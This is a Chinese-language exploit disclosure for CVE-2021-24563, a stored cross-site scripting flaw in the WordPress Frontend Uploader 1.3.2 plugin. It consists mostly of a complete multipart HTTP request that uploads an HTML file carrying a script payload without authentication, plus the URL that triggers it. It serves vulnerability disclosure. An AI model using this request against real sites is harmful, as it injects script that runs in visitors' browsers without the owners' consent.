WordPress 前端上传器 1.3.2 跨站脚本

2022-01-14 15:17:22 浏览数 (1)

供应​​商主页:https://wordpress.org/plugins/frontend-uploader/

软件链接:https://plugins.trac.wordpress.org/browser/frontend-uploader/

版本:1.3.2

测试于:Windows 10 - Chrome、WordPress 5.8.2

CVE:CVE-2021-24563

参考:

https://www.youtube.com/watch?v=lfrLoHl4-Zs

https://wpscan.com/vulnerability/e53ef41e-a176-4d00-916a-3a03835370f1

该插件不会阻止通过其表单上传 HTML 文件,例如允许未经身份验证的用户上传包含 JavaScript 的恶意 HTML 文件,当有人直接访问该文件时会触发该文件

代码语言:javascript复制
POST /wp-admin/admin-ajax.php HTTP/1.1

Accept:
text/html,application/xhtml xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: en-GB,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: multipart/form-data;
boundary=---------------------------124662954015823207281179831654

Content-Length: 1396

Connection: close

Upgrade-Insecure-Requests: 1


-----------------------------124662954015823207281179831654

Content-Disposition: form-data; name="post_ID"


1247

-----------------------------124662954015823207281179831654

Content-Disposition: form-data; name="post_title"


test

-----------------------------124662954015823207281179831654

Content-Disposition: form-data; name="post_content"


test

-----------------------------124662954015823207281179831654

Content-Disposition: form-data; name="files[]"; filename="xss.html"

Content-Type: text/html


<script>alert(/XSS/)</script>

-----------------------------124662954015823207281179831654

Content-Disposition: form-data; name="action"


upload_ugc

-----------------------------124662954015823207281179831654

Content-Disposition: form-data; name="form_layout"


image

-----------------------------124662954015823207281179831654

Content-Disposition: form-data; name="fu_nonce"


021fb612f9

-----------------------------124662954015823207281179831654

Content-Disposition: form-data; name="_wp_http_referer"


/wordpress/frontend-uploader-form/

-----------------------------124662954015823207281179831654

Content-Disposition: form-data; name="ff"


92b6cbfa6120e13ff1654e28cef2a271

-----------------------------124662954015823207281179831654

Content-Disposition: form-data; name="form_post_id"


1247

-----------------------------124662954015823207281179831654--

然后访问上传的触发XSS,即https://example.com/wp-content/uploads/2021/07/xss.html

https html wordpress 网站建设 网站

0 人点赞